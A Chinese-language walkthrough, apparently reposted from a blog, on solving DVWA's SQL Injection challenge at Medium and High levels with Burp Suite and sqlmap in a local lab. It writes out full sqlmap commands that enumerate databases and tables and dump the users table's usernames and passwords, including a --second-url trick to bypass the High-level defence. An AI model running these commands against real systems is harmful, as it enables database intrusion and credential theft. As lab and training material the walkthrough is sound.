前情提要:
(注意:该文中我主要采取的是sqlmap工具的方式进行注入)
我已经配置了的环境与安装好的软件:
- 小皮面板中的MySQL和Apache环境已经开启
- 有火狐浏览器,且已经安装好了FoxyProxy网络代理的插件
- 已经自行安装好了burp suite抓包工具
- 有sqlmap自动注入的工具
-
打开小皮面板中的Apache和MySQL环境
![image-20251203185955238]()
-
从小皮面板中的【网站】打开dvwa靶场
![image-20251203190041029]()
-
进入网站后,我会选择把地址复制粘贴到火狐浏览器中进行下一步(火狐浏览器能方便我们后续的注入操作)
![image-20251203190130331]()
-
输入登录信息后,更改DVWA Security的等级为Medium
![image-20251203190203987]()
-
进入SQL Injection模块中
![image-20251203190524421]()
-
打开我们已经配置好的FoxyProxy代理(对应burp suite抓包工具的地址)
![image-20251203190636448]()
-
打开我们的burp suite抓包工具,开启拦截(拦截是打开的时候就默认开启的)
![image-20251203190725206]()
SQL Injection——Medium
Medium级别和low级别的SQL Injection有很大不同,没法从输入框进行注入了
可以采取以下的方法:
- 尝试burp suite抓包工具进行注入【手工注入】
- 使用sqlmap工具进行注入【自动执行】
使用sqlmap工具进行注入
-
在我们的DVWA界面中选择一个用户的id,使我们的抓包工具成功抓到包
![image-20251203191347120]()
-
抓到的包我们放到重发器(Repeater)中
![image-20251203191424515]()
-
创建一个新的txt文件(推荐命名为dvwa_m)【在sqlmap的文件中】
![image-20251203191513416]()
-
把我们放在重发器中的内容复制粘贴进去
![image-20251203191943603]()

-
打开我们的sqlmap工具,在有sqlmap.py的文件路径下直接输入“cmd”进入命令行
![image-20251203192133686]()
-
使用
python sqlmap.py -h进入sqlmap中(中间按enter)

-
获得数据库:
python .\sqlmap.py -r .\dvwa-m.txt -dbs![image-20251203105615402]()
-
获取表格:
python .\sqlmap.py -r .\dvwa-m.txt -D dvwa --tables![image-20251203105821203]()
-
获取表格的字段数据:
python .\sqlmap.py -r .\dvwa-m.txt -D dvwa -T users --columns![image-20251203105835106]()
-
获取字段内容:
python .\sqlmap.py -r .\dvwa-m.txt -D dvwa -T users -C user --dump![image-20251203110346837]()
注意的小点:
- 在抓包工具中复制的信息的是完整的,不要有错/漏的地方
- 确保自己的DVWA网站仍在运行中(没有退出等)
- 确保文件名正确
SQL Injection——High
【简略了很多的步骤和操作过程,但运行其实和Medium是差不多的,只是比Medium多了一个页面,可以不用使用我的这种sqlmap的方法也能做到,直接在第二个弹出的页面当中使用low级别时候的操作就可以了】
high级别通关方法
- 在第二个页面中采用low测试的方法进行注入
- 使用参数--second-url进行注入
获取所有数据库:
python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" --dbs

获取所有表格:
python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa --tables

获取所有字段:
python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa -T users --columns

获取所有的字段内容:
python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa -T users -C "user,password" --dump

--second-url+查询结果显示页面链接,将会无视这种链接防御
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/986015.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!














